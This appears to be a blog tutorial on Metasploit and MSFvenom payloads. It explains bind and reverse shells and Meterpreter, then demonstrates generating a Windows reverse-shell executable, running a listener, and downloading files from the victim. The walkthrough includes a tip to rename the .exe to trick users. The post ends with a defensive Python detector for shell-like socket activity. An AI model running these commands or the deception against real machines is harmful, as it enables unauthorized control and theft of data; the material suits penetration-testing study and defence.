In layman's terms, an exploit is a security attack on a vulnerability. Exploits have the potential for large-scale damage, such as installing malware, gaining system access, or recruiting client machines into an existing botnet. MSFvenom Payload helps to accomplish this. The payload is the sequence of code that is executed when the vulnerability is triggered. To make things clear, an exploit is really broken up into two parts, like so:
EXPLOIT = Vulnerability + Payload
More on payloads:
- Payloads are usually written in assembly language.
- Payloads are platform- and OS-dependent. That is, a Win32 payload will not work on Linux (even if we are exploiting the same bug).
Different payload types exist and they accomplish different tasks such as:
- exec: Execute a command or program on the remote system
- download_exec: Download a file from a URL and execute it
- upload_exec: Upload a local file and execute it
- adduser: Add a user to the system accounts
Payloads come in many different flavours and can range from a few lines of code to small applications such as the Meterpreter shell. One should not just automatically jump to the Meterpreter shell. Metasploit contains over 200 different payloads.
However, the most common payload type used with exploits is shellcode, also known as shell payloads. These payloads are very useful because they provide the attacker with an interactive shell that can be used to completely control the system remotely.
There are two different types of shell payloads:
Bind Shells: A socket is created, a port is bound to it, and when a connection is established to that port, a shell is spawned. The shell lies dormant while awaiting instructions from an attacker.
Reverse Shells: Instead of creating a listening socket, a connection is created to a predefined IP address and port, and a shell is then shovelled back to the attacker.
Meterpreter shell
The Meterpreter (short for meta-interpreter) shell, a special type of shell, is the bread and butter of Metasploit. It can be added as a payload that is either a bind shell or a reverse shell. The Meterpreter is one of the advanced payloads available with the MSF, but you should not look at it as just a payload. Rather, one should view it as an exploit platform that is executed on the remote system. It has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system.
Additionally, the Meterpreter allows developers to write their own extensions, in the form of DLL files, which one can upload and execute on the remote system. Thus, any programming language in which programs can be compiled into DLLs can be used to develop Meterpreter extensions.
However, the real beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system once exploitation occurs. All commands run through Meterpreter therefore execute within the context of that existing process, rather than as a new executable on disk. In this manner, it can evade detection by anti-virus systems or basic forensic examinations.
Step-by-step demonstration:
In this blog demo, we are going to try and generate a payload in order to get control of a client Windows machine. I will try to keep this as concise as possible. Let’s get started!
On your Kali virtual machine, go to Exploitation Tools -> MSFvenom Payload Creator.
To create a payload, we simply need to state the target type and where to listen. In this case, the target is a Windows machine and we will be listening on the Ethernet interface.
Type the following command in the terminal: /usr/bin/msfpc windows eth0
Hit Enter and a custom payload will be generated containing the attacker's IP address and port number. The payload need not keep its auto-generated name. You can change it to any convenient name that will fool the user into running the .exe file that has been created.
Further steps:
Next, we need to start the listener by running the MSF handler file with the command: msfconsole -q -r '/root/filename.rc'
The listener will start up and wait for the Windows machine to execute the .exe file.
For demo purposes, I have already loaded the .exe file on a Windows machine and will now execute it by double-clicking it.
Note: The victim and host machines should be on the same LAN.
As soon as the .exe file is run, a session is initiated on the attacker machine. We need to enter the session by typing the command with its session ID: sessions -i 1
With this, the two computers can talk back and forth and the Windows machine can be controlled through this terminal.
In the image below, the pwd command displays the current directory on my Windows machine, and the dir command lists all the directories along with their permissions.
Thus an attacker can search for sensitive information on a victim PC remotely.
For instance, in the above image, one of the directories is named Passwords and may contain passwords saved in a plain text file. The files can be downloaded to your Kali machine with one simple command: download 'file1.txt'
Similarly, an attacker can edit or upload files on the client machine. This concludes a basic Metasploit demo in which we generated a payload and exploited a victim Windows machine. Metasploit thus provides efficient and easy-to-use tools for exploitation. It is an industry favourite, as developers can write their own extensions and avoid detection by anti-virus systems. To know more about Metasploit, go to.
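From the defender's side, the bind shell and reverse shell patterns described earlier, and the demo above (a freshly dropped .exe that calls back to the handler), both show up as socket activity owned by a process that has no business doing network I/O. The following added example, which is not code from the original post or from Metasploit, classifies netstat-style socket records into bind-shell and reverse-shell indicators; the row format, the allow-lists of expected processes and the sample rows are constructed assumptions.

```python
# Added example, not code from the original post: classify socket records into
# bind-shell and reverse-shell indicators. The record format, allow-lists and
# sample lines are constructed assumptions (netstat-style rows plus image path).
from typing import List, Optional, Tuple

# Assumption: processes expected to listen or to make outbound connections;
# a real deployment derives these from the host's service inventory.
EXPECTED_LISTENERS = {"svchost.exe", "system", "lsass.exe"}
EXPECTED_CLIENTS = {"chrome.exe", "outlook.exe", "svchost.exe"}
USER_WRITABLE_DIRS = ("\\users\\", "\\temp\\", "\\downloads\\", "\\appdata\\")
FIELDS = ("proto", "local", "remote", "state", "pid", "image")

def parse_line(line: str) -> dict:
    # Constructed row format: proto local remote state pid image_path
    # (maxsplit keeps spaces inside the image path intact).
    rec = dict(zip(FIELDS, line.split(None, 5)))
    rec["pid"] = int(rec["pid"])
    return rec

def classify(rec: dict) -> Optional[str]:
    path = rec["image"].lower()
    name = path.rsplit("\\", 1)[-1]
    from_user_dir = any(d in path for d in USER_WRITABLE_DIRS)
    if rec["state"] == "LISTENING" and (name not in EXPECTED_LISTENERS or from_user_dir):
        # Bind-shell pattern: a listening port owned by an unexpected binary.
        return "possible bind shell"
    if rec["state"] == "ESTABLISHED" and (name not in EXPECTED_CLIENTS or from_user_dir):
        # Reverse-shell pattern: outbound session from a binary that should not be a
        # network client, e.g. a freshly dropped .exe in Downloads (the demo case).
        return "possible reverse shell"
    return None

# Constructed sample: a benign listener, the dropped executable both listening and
# calling back to the handler, and a benign browser connection.
SAMPLE = """\
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 880 C:\\Windows\\System32\\svchost.exe
TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING 5120 C:\\Users\\bob\\Downloads\\update.exe
TCP 192.168.1.20:51234 192.168.1.10:4444 ESTABLISHED 5120 C:\\Users\\bob\\Downloads\\update.exe
TCP 192.168.1.20:51240 142.250.1.1:443 ESTABLISHED 2200 C:\\Program Files\\Google\\Chrome\\chrome.exe
"""

def find_alerts(text: str) -> List[Tuple[int, str]]:
    """Return (pid, verdict) for every record matching a shell pattern."""
    alerts = []
    for rec in map(parse_line, text.splitlines()):
        verdict = classify(rec)
        if verdict:
            alerts.append((rec["pid"], verdict))
    return alerts
```

Running find_alerts(SAMPLE) flags only PID 5120, once for the listening socket and once for the outbound session, while the svchost and browser rows pass; the same process-based rule also catches a shell on a non-default port, which a port-only rule would miss.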